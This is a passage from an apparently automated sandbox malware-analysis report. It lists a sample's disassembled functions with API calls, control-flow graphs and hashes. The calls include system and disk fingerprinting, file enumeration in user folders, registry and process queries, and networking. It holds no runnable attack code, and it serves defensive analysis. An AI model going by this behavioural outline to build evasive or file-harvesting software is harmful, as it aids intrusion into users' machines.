                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 73313f3818f1d998f1379cb9ef1bbaa04e0bdbf26de5a2b92d8e4f3e7165fac4
                                                              • Instruction ID: 49af10239589ae05f2a75953827b8c7322d997c79791afaadc76953566643fb3
                                                              • Opcode Fuzzy Hash: 73313f3818f1d998f1379cb9ef1bbaa04e0bdbf26de5a2b92d8e4f3e7165fac4
                                                              • Instruction Fuzzy Hash: ACC2B231A043459FD714CF29C484BAAB7E2FF84314F09866DEC999B362D771E984CBA1
                                                              Function 00D9255D Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00D92579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 00D925CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00D92647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 00D9267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 00D927E2
                                                              • SHGetKnownFolderPath.SHELL32 ref: 00D9286D
                                                              • FindFirstFileW.KERNELBASE ref: 00D928F8
                                                              • FindNextFileW.KERNELBASE ref: 00D9291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                              • String ID: @$`
                                                              • API String ID: 2066228396-3318628307
                                                              • Opcode ID: 2872ac62c1561a0044e54a8b1d571655480e81267495a052ef8724c68b0ce8db
                                                              • Instruction ID: 2af60ab99fc297b3355d2cc56614f8b54dd1fee494daaca536f8d0dcc56858c3
                                                              • Opcode Fuzzy Hash: 2872ac62c1561a0044e54a8b1d571655480e81267495a052ef8724c68b0ce8db
                                                              • Instruction Fuzzy Hash: 53D1C7B49043199FCB10EF68C5946AEBBF4BF58348F00896DE898D7354E7349A84CF92
                                                              Function 00D929FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1365 d929ff-d92a2f FindFirstFileA 1366 d92a38 1365->1366 1367 d92a31-d92a36 1365->1367 1368 d92a3d-d92a91 call 1219c50 call 1219ce0 RegOpenKeyExA 1366->1368 1367->1368 1373 d92a9a 1368->1373 1374 d92a93-d92a98 1368->1374 1375 d92a9f-d92b0c call 1219c50 call 1219ce0 CharUpperA call 1118da0 1373->1375 1374->1375 1383 d92b0e-d92b13 1375->1383 1384 d92b15 1375->1384 1385 d92b1a-d92b92 call 1219c50 call 1219ce0 call 1118e80 call 1118e70 1383->1385 1384->1385 1394 d92bcc-d92c66 QueryFullProcessImageNameA CloseHandle call 1118da0 1385->1394 1395 d92b94-d92ba3 1385->1395 1405 d92c68-d92c6d 1394->1405 1406 d92c6f 1394->1406 1398 d92bb0-d92bca call 1118e68 1395->1398 1399 d92ba5-d92bae 1395->1399 1398->1394 1398->1395 1399->1394 1407 d92c74-d92ce9 call 1219c50 call 1219ce0 call 1118e80 call 1118e70 1405->1407 1406->1407 1416 d92dcf-d92e1c call 1219c50 call 1219ce0 CloseHandle 1407->1416 1417 d92cef-d92d49 call 1118bb0 call 1118da0 1407->1417 1427 d92e23-d92e2e 1416->1427 1428 d92d99-d92dad 1417->1428 1429 d92d4b-d92d63 call 1118da0 1417->1429 1430 d92e30-d92e35 1427->1430 1431 d92e37 1427->1431 1428->1416 1429->1428 1438 d92d65-d92d7d call 1118da0 1429->1438 1433 d92e3c-d92ed6 call 1219c50 call 1219ce0 1430->1433 1431->1433 1446 d92ed8-d92ee1 1433->1446 1447 d92eea 1433->1447 1438->1428 1443 d92d7f-d92d97 call 1118da0 1438->1443 1443->1428 1449 d92daf-d92dc9 call 1118e68 1443->1449 1446->1447 1450 d92ee3-d92ee8 1446->1450 1451 d92eef-d92f16 call 1219c50 call 1219ce0 1447->1451 1449->1416 1449->1417 1450->1451
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: dac00043dd16b07d3d1f8bc8445f32386e0208a4ad73cca66e88023fedc2f56b
                                                              • Instruction ID: df035067fc61094cebc69a7d6427bc3fbba958b71fde37416599a6842e0e2d07
                                                              • Opcode Fuzzy Hash: dac00043dd16b07d3d1f8bc8445f32386e0208a4ad73cca66e88023fedc2f56b
                                                              • Instruction Fuzzy Hash: 38E1FBB49053059FDB10EF68D9946AEBBF8BF58348F108869E888D7354E734D988CF52
                                                              Function 00DA05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1661 da05b0-da05b7 1662 da07ee 1661->1662 1663 da05bd-da05d4 1661->1663 1664 da05da-da05e6 1663->1664 1665 da07e7-da07ed 1663->1665 1664->1665 1666 da05ec-da05f0 1664->1666 1665->1662 1667 da05f6-da0620 call da7350 call d970b0 1666->1667 1668 da07c7-da07cc 1666->1668 1673 da066a-da068c call dcdec0 1667->1673 1674 da0622-da0624 1667->1674 1668->1665 1680 da0692-da06a0 1673->1680 1681 da07d6-da07e3 call da7380 1673->1681 1675 da0630-da0655 call d970d0 call da03c0 call da7450 1674->1675 1701 da065b-da0668 call d970e0 1675->1701 1702 da07ce 1675->1702 1684 da06a2-da06a4 1680->1684 1685 da06f4-da06f6 1680->1685 1681->1665 1686 da06b0-da06e4 call da73b0 1684->1686 1688 da07ef-da082b call da3000 1685->1688 1689 da06fc-da06fe 1685->1689 1686->1681 1700 da06ea-da06ee 1686->1700 1705 da0a2f-da0a35 1688->1705 1706 da0831-da0837 1688->1706 1693 da072c-da0754 1689->1693 1697 da075f-da078b 1693->1697 1698 da0756-da075b 1693->1698 1716 da0700-da0703 1697->1716 1717 da0791-da0796 1697->1717 1703 da075d 1698->1703 1704 da0707-da0719 WSAEventSelect 1698->1704 1700->1686 1710 da06f0 1700->1710 1701->1673 1701->1675 1702->1681 1715 da0723-da0726 1703->1715 1704->1681 1714 da071f 1704->1714 1711 da0a3c-da0a52 1705->1711 1712 da0a37-da0a3a 1705->1712 1708 da0839-da084c call da6fa0 1706->1708 1709 da0861-da087e 1706->1709 1726 da0a9c-da0aa4 1708->1726 1727 da0852 1708->1727 1728 da0882-da088d 1709->1728 1710->1685 1711->1681 1719 da0a58-da0a81 call da2f10 1711->1719 1712->1711 1714->1715 1715->1688 1715->1693 1716->1704 1717->1716 1721 da079c-da07c2 call d976a0 1717->1721 1719->1681 1734 da0a87-da0a97 call da6df0 1719->1734 1721->1716 1726->1681 1727->1709 1731 da0854-da085f 1727->1731 1732 da0893-da08b1 1728->1732 1733 da0970-da0975 1728->1733 1731->1728 1737 da08c8-da08f7 1732->1737 1735 da097b-da0989 call d970b0 1733->1735 1736 da0a19-da0a2c 1733->1736 1734->1681 1735->1736 1744 da098f-da099e 1735->1744 1736->1705 1745 da08f9-da08fb 1737->1745 1746 da08fd-da0925 1737->1746 1748 da09b0-da09c1 call d970d0 1744->1748 1747 da0928-da093f 1745->1747 1746->1747 1752 da08b3-da08c2 1747->1752 1753 da0945-da096b 1747->1753 1754 da09c3-da09c7 1748->1754 1755 da09a0-da09ae call d970e0 1748->1755 1752->1733 1752->1737 1753->1752 1756 da09e8-da0a03 WSAEnumNetworkEvents 1754->1756 1755->1736 1755->1748 1758 da09d0-da09e6 WSAEventSelect 1756->1758 1759 da0a05-da0a17 1756->1759 1758->1755 1758->1756 1759->1758
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00DA0711
                                                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00DA09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00DA09FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: multi.c
                                                              • API String ID: 2170980988-214371023
                                                              • Opcode ID: a3f68753abe4e929fe907a5af65ed22936c1ae13716f8c574086371c3bcf403c
                                                              • Instruction ID: b43dffcbbd037e416ae5593317d2b74b4b608839ae96297191b56ec33b255786
                                                              • Opcode Fuzzy Hash: a3f68753abe4e929fe907a5af65ed22936c1ae13716f8c574086371c3bcf403c
                                                              • Instruction Fuzzy Hash: FFD1C3756083019FEB10DF64C881B6B7BE5FF96348F08882CF98596241E774E959CBB2
                                                              Function 00DA6FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1885 da6fa0-da6fd2 1886 da6feb-da6ff1 1885->1886 1887 da6fd4-da6fd6 1885->1887 1889 da6ff7-da6ff9 1886->1889 1890 da7324-da7330 1886->1890 1888 da6fe0-da6fe4 1887->1888 1891 da701b-da7041 1888->1891 1892 da6fe6-da6fe9 1888->1892 1893 da6fff-da7016 1889->1893 1894 da7186-da7196 1889->1894 1895 da7060-da7074 1891->1895 1892->1886 1892->1888 1893->1890 1894->1890 1897 da7076-da7081 1895->1897 1898 da7057-da705a 1895->1898 1897->1898 1901 da7083-da7089 1897->1901 1898->1895 1900 da7172-da7174 1898->1900 1902 da719b-da71a8 1900->1902 1903 da7176-da7184 1900->1903 1904 da708b-da708f 1901->1904 1905 da70dc-da70df 1901->1905 1906 da71f1-da722d call dad7f0 select 1902->1906 1907 da71aa-da71be 1902->1907 1903->1906 1908 da70b0-da70bd 1904->1908 1909 da7091 1904->1909 1910 da712c-da7132 1905->1910 1911 da70e1-da70e5 1905->1911 1936 da730b 1906->1936 1937 da7233-da723e 1906->1937 1914 da730d-da7310 1907->1914 1915 da71c4-da71c6 1907->1915 1919 da70bf-da70ce 1908->1919 1920 da70d5 1908->1920 1916 da70a0-da70a7 1909->1916 1910->1898 1917 da7138-da713c 1910->1917 1912 da7100-da710d 1911->1912 1913 da70e7 1911->1913 1923 da710f-da711e 1912->1923 1924 da7125 1912->1924 1922 da70f0-da70f7 1913->1922 1914->1890 1921 da7312-da7322 1914->1921 1925 da71cc-da71e6 1915->1925 1926 da7331-da7344 1915->1926 1916->1908 1927 da70a9-da70ac 1916->1927 1928 da713e 1917->1928 1929 da714d-da715a 1917->1929 1919->1920 1920->1905 1921->1890 1922->1912 1931 da70f9-da70fc 1922->1931 1923->1924 1924->1910 1925->1890 1947 da71ec 1925->1947 1926->1890 1946 da7346 1926->1946 1927->1916 1932 da70ae 1927->1932 1933 da7140-da7144 1928->1933 1934 da7050 1929->1934 1935 da7160-da716d 1929->1935 1931->1922 1939 da70fe 1931->1939 1932->1908 1933->1929 1942 da7146-da7149 1933->1942 1934->1898 1935->1934 1936->1914 1943 da725c-da7269 1937->1943 1939->1912 1942->1933 1948 da714b 1942->1948 1944 da726b-da727b __WSAFDIsSet 1943->1944 1945 da7253-da7256 1943->1945 1949 da729a-da72ac __WSAFDIsSet 1944->1949 1950 da727d-da7287 1944->1950 1945->1890 1945->1943 1946->1921 1947->1921 1948->1929 1953 da72ba-da72c9 __WSAFDIsSet 1949->1953 1954 da72ae-da72b3 1949->1954 1951 da7289 1950->1951 1952 da728e-da7293 1950->1952 1951->1952 1952->1949 1955 da7295 1952->1955 1957 da72cf-da72f6 1953->1957 1958 da7240 1953->1958 1954->1953 1956 da72b5 1954->1956 1955->1949 1956->1953 1959 da7245-da724c 1957->1959 1960 da72fc-da7306 1957->1960 1958->1959 1959->1945 1960->1959
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61b0ea8730309298aa04babd3c808097f1a3d26a0e8ef281a5e8efca1e5d87d1
                                                              • Instruction ID: 10eeea50677539946b5a0fb8a35b11484ecf9050fd763dcc0a7739b093506b15
                                                              • Opcode Fuzzy Hash: 61b0ea8730309298aa04babd3c808097f1a3d26a0e8ef281a5e8efca1e5d87d1
                                                              • Instruction Fuzzy Hash: E291023160D3494BD7358A28CC907BBB2E5EFD6364F189B2CE8A9431D4EB74DC40D6A1
                                                              Function 00E5B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1961 e5b180-e5b195 1962 e5b3e0-e5b3e7 1961->1962 1963 e5b19b-e5b1a2 1961->1963 1964 e5b1b0-e5b1b9 1963->1964 1964->1964 1965 e5b1bb-e5b1bd 1964->1965 1965->1962 1966 e5b1c3-e5b1d0 1965->1966 1968 e5b1d6-e5b1f2 1966->1968 1969 e5b3db 1966->1969 1970 e5b229-e5b22d 1968->1970 1969->1962 1971 e5b233-e5b246 1970->1971 1972 e5b3e8-e5b417 1970->1972 1973 e5b260-e5b264 1971->1973 1974 e5b248-e5b24b 1971->1974 1980 e5b582-e5b589 1972->1980 1981 e5b41d-e5b429 1972->1981 1978 e5b269-e5b286 call e5af30 1973->1978 1975 e5b215-e5b223 1974->1975 1976 e5b24d-e5b256 1974->1976 1975->1970 1979 e5b315-e5b33c call 1118b00 1975->1979 1976->1978 1989 e5b2f0-e5b301 1978->1989 1990 e5b288-e5b2a3 call e5b060 1978->1990 1992 e5b342-e5b347 1979->1992 1993 e5b3bf-e5b3ca 1979->1993 1984 e5b435-e5b44c call e5b590 1981->1984 1985 e5b42b-e5b433 call e5b590 1981->1985 2002 e5b44e-e5b456 call e5b590 1984->2002 2003 e5b458-e5b471 call e5b590 1984->2003 1985->1984 1989->1975 2006 e5b307-e5b310 1989->2006 2009 e5b200-e5b213 call e5b020 1990->2009 2010 e5b2a9-e5b2c7 getsockname call e5b020 1990->2010 1999 e5b384-e5b38f 1992->1999 2000 e5b349-e5b358 1992->2000 1997 e5b3cc-e5b3d9 1993->1997 1997->1962 1999->1993 2008 e5b391-e5b3a5 1999->2008 2007 e5b360-e5b382 2000->2007 2002->2003 2019 e5b473-e5b487 2003->2019 2020 e5b48c-e5b4a7 2003->2020 2006->1997 2007->1999 2007->2007 2015 e5b3b0-e5b3bd 2008->2015 2009->1975 2017 e5b2cc-e5b2dd 2010->2017 2015->1993 2015->2015 2017->1975 2021 e5b2e3 2017->2021 2019->1980 2022 e5b4b3-e5b4cb call e5b660 2020->2022 2023 e5b4a9-e5b4b1 call e5b660 2020->2023 2021->2006 2028 e5b4cd-e5b4d5 call e5b660 2022->2028 2029 e5b4d9-e5b4f5 call e5b660 2022->2029 2023->2022 2028->2029 2034 e5b4f7-e5b50b 2029->2034 2035 e5b50d-e5b52b call e5b770 * 2 2029->2035 2034->1980 2035->1980 2040 e5b52d-e5b531 2035->2040 2041 e5b580 2040->2041 2042 e5b533-e5b53b 2040->2042 2041->1980 2043 e5b53d-e5b547 2042->2043 2044 e5b578-e5b57e 2042->2044 2043->2044 2045 e5b549-e5b54d 2043->2045 2044->1980 2045->2044 2046 e5b54f-e5b558 2045->2046 2046->2044 2047 e5b55a-e5b576 call e5b870 * 2 2046->2047 2047->1980 2047->2044
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 00E5B2B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: d6fbd614d9e2d3ac80e3bfbc0b52655b8512ec935425144e202939b4be64b47a
                                                              • Instruction ID: a8cba1f9a795b9080e42a064eaf136de6fd2c6b94dacdd56f85d997ecba0ad97
                                                              • Opcode Fuzzy Hash: d6fbd614d9e2d3ac80e3bfbc0b52655b8512ec935425144e202939b4be64b47a
                                                              • Instruction Fuzzy Hash: 6BC16E716043059FD718DF24C881A6A77E2FF88349F14996CF849AB3A1E771ED49CB81
                                                              Function 00E5A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00E4712E,?,?,?,00001001,00000000), ref: 00E5A90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 4c01a59c3e246b0812fceb7eb3cbc8156bf675f92870388c606bac1401e5eae6
                                                              • Instruction ID: 60ff32546efedfecb8ac3fe16fc0023f632b845c4c2dd242a636c2a2613dbe84
                                                              • Opcode Fuzzy Hash: 4c01a59c3e246b0812fceb7eb3cbc8156bf675f92870388c606bac1401e5eae6
                                                              • Instruction Fuzzy Hash: 37F06D75208318AFD2109E01EC44D7BBBEDFFC9758F058A6DFD48232118270AE14CAB2
                                                              Function 00E4A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
